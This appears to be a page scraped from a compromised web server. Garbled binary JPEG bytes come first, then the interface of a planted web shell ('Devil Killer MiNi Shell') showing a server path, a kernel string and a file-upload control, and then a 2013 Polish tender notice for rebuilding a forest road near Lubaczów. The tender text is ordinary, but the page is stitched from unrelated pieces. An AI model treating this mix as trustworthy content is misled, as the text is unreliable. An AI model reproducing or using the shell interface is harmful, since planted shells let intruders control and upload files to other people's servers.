JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130424/162086-N-2013.html

<p class="kh_header"><b>Lubaczów: Przebudowa drogi leśnej w leśnictwie Krowica w km 0+000 - 0+618</b><br>
<b>Numer ogłoszenia: 162086 - 2013; data zamieszczenia: 24.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Lubaczów , ul. Słowackiego 20, 37-600 Lubaczów, woj. podkarpackie, tel. 016 6321972, 6321201, faks 016 6329004.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krosno.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Lasów Państwowych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa drogi leśnej w leśnictwie Krowica w km 0+000 - 0+618.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane pod nazwą; /Przebudowa drogi leśnej w leśnictwie Krowica w km 0+000 - 0+618/ Zamawiający nie dopuszcza składanie ofert częściowych
Temat: Przebudowa drogi leśnej w leśnictwie Krowica                  
Wspólny Słownik Zamówień: 
45233120-6 Roboty w zakresie budowy dróg 
45111213-4 Roboty w zakresie oczyszczania terenu 
45232452-5 Roboty odwadniające 
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne 
45233220-7 Roboty w zakresie nawierzchni dróg
Opis: 
Przedmiotem inwestycji jest przebudowa drogi leśnej położonej w leśnictwie Krowica,  w km 0+000 - 0+618
Zamierzenie budowlane polega na:
odmuleniu istniejących przepustów lub ich wymianę usunięciu warstwy zalegającego humusu w bezpośrednim sąsiedztwie drogi, oczyszczeniu mechaniczny istniejącej nawierzchni /naw. bitumiczna mocno skorodowana/wykonanie górnej warstwy podbudowy z tłucznia kamiennego wykonanie w-wy wiążącej /profilującej/ z betonu asfaltowego, wykonanie w-wy ścieralnej z betonu asfaltowego, oczyszczenie skarp, poboczy i dna rowów ..., odmulenie i pogłębienie istniejących rowów przydrożnych z wyprofilowaniem skarp, na całym odc. drogi po obu stronach, wykonanie placów manewrowych, zjazdów i mijanek, wykonanie poboczy gruntowych, wykonanie nasypów i wykopów, zgodnie z dokumentacją zamieszczoną w załącznikach nr 8 do SIWZ.
Zamawiający nie dopuszcza składania ofert wariantowych. 

Miejsce realizacji:
powiat lubaczowski, gmina Lubaczów , leśnictwo Krowica..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających do 20 % wartości zamówienia podstawowego - teren Nadleśnictwo Lubaczów</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.11.12.13-4, 45.23.24.52-5, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM
1. Oferta musi być zabezpieczona wadium w wysokości: 
15 000.00 PLN (słownie:  piętnaście tysięcy 00/100 PLN)
2. Wadium należy wnieść w terminie do dnia 2013-05-10 do godz. 10:00.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a. pieniądzu: przelewem na rachunek bankowy Zamawiającego: PEKAO S.A. I oddz. w Lubaczowie 93124025841111000039445436;
b. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych;
c. gwarancjach ubezpieczeniowych;
d. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 3a  rachunek bankowy najpóźniej przed upływem terminu składania ofert
4. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
5. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy pzp.).
5. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
6. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. 
8. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b. nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia, polegające na wykonaniu w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie; 
na wykonaniu co najmniej 3 robót budowlanych o podobnym zakresie:
o wartości brutto 400 000,00 PLN każda,
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim potencjałem technicznym, w tym co najmniej:
1.   walec samojezdny 10 t stalowy - 1 szt.
2.   walec samojezdny 12 t stalowy - 1 szt.
3.   rozścielacz do kamienia 3,5 m - 1 szt.  
4.   rozścielacz do masy mineralno-bitumicznej 3,5 m. - 1 szt. 
5.   koparka o poj. 0.40 m3 - 1 szt, 
6.  Samochody o ładowności powyżej 10 t - 5 szt. 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują co najmniej jedną osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności drogowej w ograniczonym zakresie - dla każdego zadania oddzielnie. 
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej, poprzez :
1.  Posiadanie środków finansowych lub zdolności kredytowej na  kwotę nie niższą niż;  400 000,00 PLN,
2. Posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie niższą niż 400.000,00 PLN. 
W przypadku, gdy złożone przez Wykonawcę dokumenty zawierają dane w innych walutach niż określono to w treści SIWZ, zamawiający jako kurs przeliczeniowy waluty przyjmuje średni kurs NBP z dnia wszczęcia postępowania. Jeżeli w dniu wszczęcia postępowania kurs danej waluty nie był ogłaszany przez NPB, obowiązuje kurs ogłoszony bezpośrednio przed wszczęciem postępowania.
 Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1 Zamawiający zleca a Wykonawca przyjmuje do wykonania roboty budowlane pod nazwą Przebudowa drogi leśnej w leśnictwie Krowica
2 Zakres rzeczowy określa dokumentacja techniczna
3 Termin realizacji 15.09.2013 r.
4 Do obowiązków Zamawiającego należy 
4.1 przekazanie dokumentacji technicznej
4.2 przekazanie placu budowy do dziesięciu dni od podpisania niniejszej umowy
4.3 zapewnienie nadzoru inwestorskiego
4.4 zapewnienie odbioru wykonanych robót w terminach określonych w umowie
4.5 niezwłoczne rozwiązywanie problemów technicznych wskazanych wpisami do dziennika budowy
4.6 zapłata wynagrodzenia
5 Do obowiązków Wykonawcy należy
5.1 wykonanie przedmiotu umowy zgodnie z dokumentacją projektową, SST, obowiązującymi przepisami, normami i warunkami technicznymi wykonania robót i odbioru robót, ze wskazówkami Zamawiającego oraz zasadami wiedzy technicznej i sztuką budowlaną, zgłoszenie wykonanych robót do odbioru wpisem do dziennika budowy
5.2 prowadzenie robót z zapewnieniem warunków zgodnych z przepisami BHP, p.poż. i ochrony przed kradzieżą, oraz przejęcie obowiązków koordynatora do spraw BHP
5.3 Wykonawca w oparciu o tabelę zagrożeń, poinformuje swoich pracowników o zagrożeniach dla bezpieczeństwa i zdrowia związanych z wykonywaniem przedmiotu zamówienia
5.4 prowadzenie robót ziemnych poza terminami rozpoczęcia i zakończenia okresu rozrodczego płazów i ptaków
5.3 utrzymanie terenu budowy w należytym porządku a po zakończeniu robót uporządkowanie terenu i przekazanie go Zamawiającemu w terminie ustalonym na odbiór robót
5.4 w przypadku zniszczenia lub uszkodzenia robót, ich części bądź urządzeń w toku realizacji, z winy Wykonawcy, naprawienie ich i doprowadzenie do stanu poprzedniego
5.5 prowadzenie dziennika budowy będącego dokumentacją prac realizowanych
5.6 zorganizowanie zaplecza budowy na własny koszt
5.7 zawarcie umów ubezpieczenia z tytułu szkód, które mogą zaistnieć na placu budowy w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej i przedłożenia ich Zamawiającemu
6. Strony ustalają, że za wykonanie przedmiotu umowy określonego w pkt 1 przysługuje Wykonawcy kosztorysowe w wysokości  xxx PLN netto słownie xxx  plus należny podatek VAT w stawce  x % tj xxx PLN, zgodnie z ofetą przetargową
7 Rozliczenie wynagrodzenia Wykonawcy za przedmiot umowy nastąpi fakturami za każdy z odcinków opisanych w kosztorysach oddzielnie
7.1 na podstawie protokołu końcowego odbioru robót podpisanego przez obie strony i zatwierdzonego przez Nadleśniczego, kosztorysów powykonawczych sprawdzonych przez Inspektora Nadzoru
7.2 Zamawiający nie dopuszcza częściowych odbiorów robót oraz wystawienia faktur za roboty częściowe
8 Należność za roboty będzie płatna w formie przelewu w terminie 30 dni od daty otrzymania faktur przez Zamawiającego na rachynek bankowy Wykonawcy nr xxxx 9 Wykonawca zobowiązuje się wykonać przedmiot umowy przy użyciu materiałów własnych, zgodnych z dokumentacą techniczną, jakości zatwierdzonej przez Zamawiającego
10 Zastosowane materiały winny posiadać certyfikaty na znak bezpieczeństwa /w tym p.poż./, atesty, być zgodne z kryteriami technicznymi określonymi w polskich normach lub aprobatą technizną, o ile dla danego wyrobu nie ustalono Polskiej Normy oraz zgodnie z właściwymi przepisami i dokumentacjami technicznymi
11 Dokumenty, o których mowa w pkt. 4.1 Wykonawca zwróci Zamawiajacemu podczas końcowego odbioru przedmiotu umowy, a na każde żadanie Zamawiającego przekaże do wglądu
12 Wykonawca wnosi zabezpieczenie należytego wykonania umowy w wysokości 5% wynagrodzenia określonego w pkt. 6 tj. w kwocie /xxx/ złotych najpóźniej w dniu zawarcia umowy, w formie xxx
13 Część zabezpieczenia w wysokości 70% ustalonej kwoty w pkt 12 zostanie zwolniona 30 dni po ostatecznym bezusterkowym odbiorze, pozostała część zabezpieczenia zostanie zwolniona w ciągu 14 dni po upływie okresu rękojmi tj w dniu xxx
14 Przedstawicielem Zamawiającego na budowie jest Inspektor Nadzoru xxx
15 Przedstawicielem Wykonawcy na budowie jest kierownik budowy xxx
16 Przedmiotem odbioru końcowego robót budowlanych będzie przedmiot umowy
17 Wykonawca /kierownik budowy/ zgłosi Zamawiającemu gotowość do odbioru końcowego na piśmie oraz wpisem w dzienniku budowy, potwierdzenie tego wpisu lub brak ustosunkowania się przez Inspektora Nadzoru w terminie 7 dni od daty dokonania wpisu oznaczać będzie osiągnięcie gotowości do odbioru w dacie wpisu do dziennika budowy.
18 Zamawiający wyznaczy termin i rozpocznie odbiór przedmiotu umowy w ciągu 10 dni od daty zawiadomienia go o osiągnięciu gotowości do odbioru zawiadamiając o tym Wykonawcę
19 Jeżeli w toku czynności odbioru zostaną stwierdzone wady Zamawiającemu przysługują następujące uprawnienia
19.1 jeżeli wady nadają się do usunięcia może odmowić odbioru do czasu usunięcia wad
19.2 jeżeli wady nie nadają się do usunięcia to
a/ jeżeli umożliwiają one użytkowanie przedmiotu odbioru zgodnie z przeznaczeniem Zamawiający może obniżyć odpowiednio wynagrodzenie
b/ jeżeli wady uniemożliwiają użytkowanie zgodnie z przeznaczeniem Zamawiajacy może odstąpić od umowy lub żądać wykonania przedmiotu odbioru po raz drugi
20 Z czynności odbioru będzie spisany protokół zawierający wszelkie ustalenia dokonane w toku odbioru jak też terminy wyznaczone na usunięcie stwierdzonych podczas odbioru wad 
21 Wykonawca przedłoży Zamawiajacemu w dniu odbioru komplet dokumentów wymaganych przepisami prawa budowlanegom oraz zwróci Zamawiającemu dokumentację techniczną z naniesionymi zmianami powykonawczymi
22 Wykonawca zobowiązany jest do zawiadomienia Zamawiajacego /inspektora nadzoru/ o usunięciu wad oraz do żądania wyznaczenia terminu na odbiór zakwestionowanych uprzednio robót, jako wadliwych
23 Zamawiajacy może podjąć decyzję o przerwaniu odbioru, jeżeli w czasie tych cynności ujawniono istnienie takich wad, które uniemożliwiają użtkowanie przedmiotu umowy zgodnie z przeznaczeniem - aż do usunięcia tych wad
24 Wykonawca gwarantuje, że przedmiot Umowy okrślony w pkt 1 wykonany zostanie dobrze jakościowo, zgodnie z dokumentacją projektową, warunkami /normami/ technicznymi wykonawstwa i warunkami umowy, bez wad pomniejszających wartość robót lub uniemożliwiających użytkowanie obiektu zgodnie z jego przeznaczeniem
25 Uprawnienia Zamawiajacego z tytułu rękojmi wygasają po upływie 3 lat licząc od daty odbioru końcowego obiektu
26 Wykonawca udzieli 36 miesięcy gwarancji jakości na przedmiot umowy w zakresie robót budowlanych licząc od daty odbioru końcowego /według wzoru określonego w załączniku nr 7/
27 Okres gwarancji jakości naprawianego elementu ulega wydłużeniu o cas usunięcia jego wad.
